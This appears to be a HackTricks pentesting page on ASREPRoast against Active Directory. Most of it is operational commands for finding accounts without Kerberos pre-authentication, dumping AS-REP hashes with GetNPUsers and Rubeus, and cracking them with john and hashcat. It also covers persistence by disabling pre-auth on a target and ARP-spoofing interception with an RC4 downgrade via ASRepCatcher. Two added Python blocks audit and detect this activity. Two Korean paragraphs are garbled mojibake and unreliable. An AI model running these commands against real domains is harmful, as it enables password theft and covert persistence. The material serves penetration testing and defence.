ASREPRoast

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ASREPRoast

ASREPRoast is an attack that targets users who lack the Kerberos pre-authentication required attribute. In essence, it lets an attacker request authentication for such a user from the Domain Controller (DC) without knowing the user's password. The DC answers with a message encrypted under a key derived from the user's password, and the attacker can attempt to crack that message offline to recover the password.

The main requirements for this attack are:

  • Kerberos pre-authentication disabled: the target user must not have this security feature enabled.
  • Connectivity to the Domain Controller (DC): the attacker needs to reach the DC to send the request and receive the encrypted message.
  • Optional domain account: with a domain account the attacker can identify vulnerable users more efficiently via LDAP queries. Without one, usernames have to be guessed.

Enumerating vulnerable users (domain credentials required)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

Requesting the AS_REP message

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

Warning

AS-REP Roasting with Rubeus generates a 4768 event with an encryption type of 0x17 and a pre-authentication type of 0.

Cracking

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Persistence

์‚ฌ์šฉ์ž์—๊ฒŒ GenericAll ๊ถŒํ•œ(๋˜๋Š” ์†์„ฑ ์“ฐ๊ธฐ ๊ถŒํ•œ)์ด ์žˆ๋Š” ๊ฒฝ์šฐ preauth๊ฐ€ ํ•„์š”ํ•˜์ง€ ์•Š๋„๋ก ๊ฐ•์ œํ•ฉ๋‹ˆ๋‹ค:

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
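The LDAP filter in the enumeration section and the -XOR write in the persistence section both operate on one userAccountControl bit, 4194304 (DONT_REQ_PREAUTH, 0x400000). The following is an added example, not part of the original page, showing the audit side of that in Python: it evaluates the same two-bit condition the filter expresses (flag set and account not disabled), shows why an XOR write toggles rather than sets the flag, and computes the remediated value. The account records are constructed sample data with hypothetical names.

```python
# Added example (not from the original page): audit and remediate the
# userAccountControl bit that makes an account AS-REP roastable.
# The account records below are constructed, not real directory data.

# userAccountControl flag values (decimal values as used in the page's LDAP filter)
ACCOUNTDISABLE = 0x0002          # 2
DONT_REQ_PREAUTH = 0x400000      # 4194304


def is_asrep_roastable(uac: int) -> bool:
    """True when pre-auth is not required AND the account is enabled.

    Mirrors the page's LDAP filter:
      (&(userAccountControl:1.2.840.113556.1.4.803:=4194304)
        (!(userAccountControl:1.2.840.113556.1.4.803:=2)))
    where matching rule 1.2.840.113556.1.4.803 is a bitwise AND.
    """
    return bool(uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)


def xor_uac(uac: int, flag: int) -> int:
    """What Set-DomainObject -XOR does to the attribute: it toggles the flag.

    Applying it twice restores the original value, so the same write that
    sets the bit on a normal account clears it on one that already had it.
    """
    return uac ^ flag


def clear_dont_req_preauth(uac: int) -> int:
    """Remediation value: clear only the DONT_REQ_PREAUTH bit (AND NOT, not XOR)."""
    return uac & ~DONT_REQ_PREAUTH


def find_roastable(accounts):
    """Return sorted sAMAccountNames of enabled accounts with DONT_REQ_PREAUTH set."""
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if is_asrep_roastable(a["userAccountControl"])
    )


# Constructed sample records (hypothetical names and values)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 512},                   # NORMAL_ACCOUNT only
    {"sAMAccountName": "vpn114user", "userAccountControl": 512 | 4194304},    # roastable
    {"sAMAccountName": "oldsvc", "userAccountControl": 512 | 2 | 4194304},    # flag set but disabled
    {"sAMAccountName": "svc_backup", "userAccountControl": 66048 | 4194304},  # NORMAL + DONT_EXPIRE_PASSWD + flag
]

if __name__ == "__main__":
    for name in find_roastable(SAMPLE_ACCOUNTS):
        print(f"roastable: {name}")
        # Both are 4194816 here: XOR on a clean value behaves like "set"
        print("  toggled from 512 ->", xor_uac(512, DONT_REQ_PREAUTH))
```

Because the persistence command toggles the bit, a defender reviewing 4738 (user account changed) events should compare old and new userAccountControl values rather than assume the write always set the flag; the remediation path above clears the bit explicitly.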

ASREProast without credentials

๊ณต๊ฒฉ์ž๋Š” ์ค‘๊ฐ„์ž ๊ณต๊ฒฉ ์œ„์น˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ AS-REP ํŒจํ‚ท์„ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” Kerberos ์‚ฌ์ „ ์ธ์ฆ์ด ๋น„ํ™œ์„ฑํ™”๋˜๋Š” ๊ฒƒ์— ์˜์กดํ•˜์ง€ ์•Š๊ณ  ๋„คํŠธ์›Œํฌ๋ฅผ ํ†ต๊ณผํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ VLAN์˜ ๋ชจ๋“  ์‚ฌ์šฉ์ž์—๊ฒŒ ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค.
ASRepCatcher ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ, ์ด ๋„๊ตฌ๋Š” Kerberos ํ˜‘์ƒ์„ ๋ณ€๊ฒฝํ•˜์—ฌ ํด๋ผ์ด์–ธํŠธ ์›Œํฌ์Šคํ…Œ์ด์…˜์ด RC4๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๊ฐ•์ œํ•ฉ๋‹ˆ๋‹ค.

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
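The warning earlier on this page gives the log signature of AS-REP roasting (event 4768, encryption type 0x17, pre-authentication type 0), and the ASRepCatcher relay described above produces RC4 (0x17) TGTs for accounts that did pre-authenticate. The following is an added example, not part of the original page or of any of the tools it mentions, showing detection logic over Windows Security event 4768 records in Python. It flags the roast pattern, the RC4-after-pre-auth pattern that points to a downgrade (or a legacy client, which is the caveat when tuning it), and source addresses that request TGTs for many distinct names without pre-auth or for unknown principals (KDC status 0x6), which is what the -usersfile approach looks like from the DC. The events are constructed JSON lines using the field names Windows writes in the 4768 EventData; the threshold is an assumption.

```python
# Added example (not from the original page): detection logic for Windows
# Security event 4768 (Kerberos TGT requested). Sample events are constructed.
import json
from collections import defaultdict

RC4_HMAC = 0x17                     # TicketEncryptionType for RC4-HMAC (the crackable etype)
PREAUTH_NONE = 0                    # PreAuthType 0: no pre-authentication data sent
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # Status when the requested principal does not exist

# Constructed 4768 events (hypothetical users and addresses). Failed requests
# log TicketEncryptionType 0xffffffff and PreAuthType "-".
SAMPLE_EVENTS = [
    '{"EventID":4768,"TargetUserName":"alice","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"10.0.0.21","Status":"0x0"}',
    '{"EventID":4768,"TargetUserName":"vpn114user","TicketEncryptionType":"0x17","PreAuthType":"0","IpAddress":"10.0.0.99","Status":"0x0"}',
    '{"EventID":4768,"TargetUserName":"bob","TicketEncryptionType":"0x17","PreAuthType":"2","IpAddress":"10.0.0.21","Status":"0x0"}',
    '{"EventID":4768,"TargetUserName":"ghost1","TicketEncryptionType":"0xffffffff","PreAuthType":"-","IpAddress":"10.0.0.99","Status":"0x6"}',
    '{"EventID":4768,"TargetUserName":"ghost2","TicketEncryptionType":"0xffffffff","PreAuthType":"-","IpAddress":"10.0.0.99","Status":"0x6"}',
    '{"EventID":4769,"TargetUserName":"alice","TicketEncryptionType":"0x12","IpAddress":"10.0.0.21","Status":"0x0"}',
]


def _to_int(value):
    """Parse a 4768 numeric field ("0x17", "2", "0x0"); returns None for "-" or missing."""
    try:
        return int(str(value), 0)
    except ValueError:
        return None


def classify(ev):
    """Classify one successful 4768 event; returns a verdict string or None."""
    if _to_int(ev.get("Status")) != 0:
        return None                                   # only issued tickets matter here
    etype = _to_int(ev.get("TicketEncryptionType"))
    preauth = _to_int(ev.get("PreAuthType"))
    if etype == RC4_HMAC and preauth == PREAUTH_NONE:
        return "asrep_roast"                          # the Rubeus / GetNPUsers signature from the warning
    if etype == RC4_HMAC:
        return "rc4_downgrade"                        # pre-auth happened, yet an RC4 TGT was issued
    return None


def analyze(lines, enum_threshold=3):
    """Run classify() over JSON lines and also spot per-source name enumeration."""
    findings = []
    names_per_source = defaultdict(set)
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 4768:
            continue
        verdict = classify(ev)
        if verdict:
            findings.append((verdict, ev["TargetUserName"], ev["IpAddress"]))
        # Requests without pre-auth, or for unknown principals, are what a
        # username-list run against the DC looks like.
        if (_to_int(ev.get("PreAuthType")) == PREAUTH_NONE
                or _to_int(ev.get("Status")) == KDC_ERR_C_PRINCIPAL_UNKNOWN):
            names_per_source[ev["IpAddress"]].add(ev["TargetUserName"])
    sources = sorted(ip for ip, names in names_per_source.items() if len(names) >= enum_threshold)
    return {"findings": findings, "enumeration_sources": sources}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for verdict, user, ip in result["findings"]:
        print(f"{verdict}: {user} requested from {ip}")
    for ip in result["enumeration_sources"]:
        print(f"possible username enumeration from {ip}")
```

In a real environment the "rc4_downgrade" verdict needs a baseline: accounts and hosts that legitimately negotiate RC4 should be allow-listed, otherwise the relay described above is indistinguishable from an old client, which is exactly why removing RC4 from the domain's supported encryption types is the durable fix.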
